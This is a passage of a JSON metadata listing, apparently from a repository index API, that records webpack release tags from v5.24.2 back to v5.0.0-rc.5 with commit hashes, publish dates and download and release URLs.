sts_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.2/manifests"},{"name":"v5.24.1","sha":"3849f45961c60d4bea91b4ef43bb7da7992a0c3a","kind":"tag","published_at":"2021-02-23T21:56:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.1/manifests"},{"name":"v5.24.0","sha":"63c14ccbfc6698cb974f8469e0a829ae1d8f44ec","kind":"tag","published_at":"2021-02-22T22:32:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.0/manifests"},{"name":"v5.23.0","sha":"7774d7ec632e66b8c6a8c0f320b3469e86ed5e26","kind":"tag","published_at":"2021-02-18T15:52:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.23.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.23.0/manifests"},{"name":"v5.22.0","sha":"f5bcac4a061897822bf10a8191231b5a71c59273","kind":"tag","published_at":"2021-02-15T09:00:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.22.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.22.0/manifests"},{"name":"v5.21.2","sha":"6661bd94fd724bb4610d348a1ffe48030dc56726","kind":"tag","published_at":"2021-02-07T18:27:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.2/manifests"},{"name":"v5.21.1","sha":"a1948fb2247adb5121ded5c3c4a04ed384b96c03","kind":"tag","published_at":"2021-02-06T09:39:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.1/manifests"},{"name":"v5.21.0","sha":"647aa17cc7fe16d382b3d48efc47258c4e96d699","kind":"tag","published_at":"2021-02-05T21:03:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.0/manifests"},{"name":"v5.20.2","sha":"f5a263750611f33adffb7644064b40b0432d6c65","kind":"tag","published_at":"2021-02-04T14:26:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.2/manifests"},{"name":"v5.20.1","sha":"82edd9150f8e54bab1497c9c29edc01bc39a88b4","kind":"tag","published_at":"2021-02-03T12:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.1/manifests"},{"name":"v5.20.0","sha":"181e045499c44c9855da56ce38ee5fecbe2998d2","kind":"tag","published_at":"2021-02-02T20:21:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.0/manifests"},{"name":"v5.19.0","sha":"3f7573c83ce53a486eff1439ba6fa9143ddbbf0b","kind":"tag","published_at":"2021-01-29T19:01:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.19.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.19.0/manifests"},{"name":"v5.18.0","sha":"16774961d4f9371251c96adf98618675eb032f30","kind":"tag","published_at":"2021-01-26T19:52:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.18.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.18.0/manifests"},{"name":"v5.17.0","sha":"d02e8daa267ca094fc0a030a595b000d35a99493","kind":"tag","published_at":"2021-01-22T14:01:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.17.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.17.0/manifests"},{"name":"v5.16.0","sha":"56246f0833333a8e277386b16408d8a3eeff553e","kind":"tag","published_at":"2021-01-19T18:39:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.16.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.16.0/manifests"},{"name":"v5.15.0","sha":"0a8bf41f169c53c0819f0f320db5957017ac58de","kind":"tag","published_at":"2021-01-15T15:53:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.15.0/manifests"},{"name":"v5.14.0","sha":"f87cafe91c251863cc3dc84ce81b60445f2a780d","kind":"tag","published_at":"2021-01-13T23:52:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.14.0/manifests"},{"name":"v5.13.0","sha":"a694cdfb82b5fd0a5c52102083a267a36446e03e","kind":"tag","published_at":"2021-01-11T22:30:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.13.0/manifests"},{"name":"v4.46.0","sha":"444e59f8a427f94f0064cae6765e5a3c4b78596d","kind":"tag","published_at":"2021-01-11T13:42:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.46.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.46.0/manifests"},{"name":"v5.12.3","sha":"a064b0ff3315db0d95124aaf5cc9b0a6add82926","kind":"tag","published_at":"2021-01-10T18:23:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.3/manifests"},{"name":"v5.12.2","sha":"88610d738ff78fa3fb7f859ee284c632bca42a24","kind":"tag","published_at":"2021-01-09T08:27:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.2/manifests"},{"name":"v5.12.1","sha":"62ec1546260d168cffd5dec8fc397c6e1159e4e4","kind":"tag","published_at":"2021-01-08T15:29:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.1/manifests"},{"name":"v5.12.0","sha":"74c9c72b873b27ec552cd6b85a9b578d6698e102","kind":"tag","published_at":"2021-01-08T12:58:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.0/manifests"},{"name":"v4.45.0","sha":"03313223fd4a0d4e570b8c79971e61b28cb3aeae","kind":"tag","published_at":"2021-01-08T12:53:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.45.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.45.0/manifests"},{"name":"v5.11.1","sha":"98bcf44a43d0109ac2680487fddf3c3262395e1f","kind":"tag","published_at":"2020-12-28T18:06:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.11.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.1/manifests"},{"name":"v5.11.0","sha":"f04328bad933fd9bacea389df17db96ffbd2336b","kind":"tag","published_at":"2020-12-17T15:59:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.0/manifests"},{"name":"v5.10.3","sha":"10ad4e95b850bbe20019275fd1d364666c4b69ea","kind":"tag","published_at":"2020-12-15T20:00:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.3/manifests"},{"name":"v5.10.2","sha":"c937292e6fb2e1e0a618d9d633f4184ec64cda75","kind":"tag","published_at":"2020-12-15T08:08:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.2/manifests"},{"name":"v5.10.1","sha":"3f3d0138f9c18658be87d89d609fc7c6d286005f","kind":"tag","published_at":"2020-12-11T20:32:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.1/manifests"},{"name":"v5.10.0","sha":"06e1cce1221ca717fc8efbaeca5ca71246f85a44","kind":"tag","published_at":"2020-12-04T19:26:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.0/manifests"},{"name":"v5.9.0","sha":"0e7437dc3042874649919d4ffe005db13053c4ff","kind":"tag","published_at":"2020-11-28T21:51:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.9.0/manifests"},{"name":"v5.8.0","sha":"fb7d09b315bbf3b5388eed0cc5e58309187a3acc","kind":"tag","published_at":"2020-11-26T17:58:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.8.0/manifests"},{"name":"v5.7.0","sha":"4ba6d2ea67e9046cbba83f588989b3cadff7d911","kind":"tag","published_at":"2020-11-26T06:08:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.7.0/manifests"},{"name":"v5.6.0","sha":"1936615458352f38ff517d258b936d690a7b631f","kind":"tag","published_at":"2020-11-19T12:18:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.6.0/manifests"},{"name":"v5.5.1","sha":"a6ebce41059a029163a1774b35d81e0bfaa05b27","kind":"tag","published_at":"2020-11-18T12:39:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.1/manifests"},{"name":"v5.5.0","sha":"3471c776059ac2d26593ea39f9c47c1874253dbb","kind":"tag","published_at":"2020-11-17T13:23:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.0/manifests"},{"name":"v5.4.0","sha":"84dafd164499b6080243cf9d00537b47b6e075c2","kind":"tag","published_at":"2020-11-03T15:28:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.4.0/manifests"},{"name":"v5.3.2","sha":"3df96f4a7843ef07794c31da8c7469dff133a228","kind":"tag","published_at":"2020-10-29T19:52:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.2/manifests"},{"name":"v5.3.1","sha":"dfae6f0ac70e1f4ec6d25a853838d4aa58e10e1f","kind":"tag","published_at":"2020-10-28T21:07:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.1/manifests"},{"name":"v5.3.0","sha":"ab555844701209492debf23cc3168a0efafb3251","kind":"tag","published_at":"2020-10-27T11:52:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.0/manifests"},{"name":"v5.2.1","sha":"d09357b4008da750e0d90066b2cd9567edc27a61","kind":"tag","published_at":"2020-10-27T11:02:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.2.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.1/manifests"},{"name":"v5.2.0","sha":"d42705c05dd62d562b759fb518f86c9854435df4","kind":"tag","published_at":"2020-10-22T16:59:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.0/manifests"},{"name":"v5.1.3","sha":"c90dfadbc6c5ac1ab4bda2cc106958b65fb5e6e7","kind":"tag","published_at":"2020-10-16T13:36:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.3/manifests"},{"name":"v5.1.2","sha":"83790375529c5b2967d45ed40700399e107d478f","kind":"tag","published_at":"2020-10-15T18:41:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.2/manifests"},{"name":"v5.1.1","sha":"f2f998b58362d5edc9945a48f8245a3347ad007c","kind":"tag","published_at":"2020-10-15T13:08:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.1/manifests"},{"name":"v5.1.0","sha":"77329b4d0e1aa35e26d8a32b2a8968a824b5de9c","kind":"tag","published_at":"2020-10-13T12:37:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.0/manifests"},{"name":"v5.0.0","sha":"610f36817af1f1c6929786d68f734ac582af1757","kind":"tag","published_at":"2020-10-10T20:07:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0/manifests"},{"name":"v5.0.0-rc.6","sha":"75ecff262ef0c1953e0d13c0b6a06bdad7ccace5","kind":"tag","published_at":"2020-10-10T19:03:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.6/manifests"},{"name":"v5.0.0-rc.5","sha":"57b493f6ff0bd55dddfbfc7ffc2f2680a7f82a6d","kind":"tag","published_at":"2020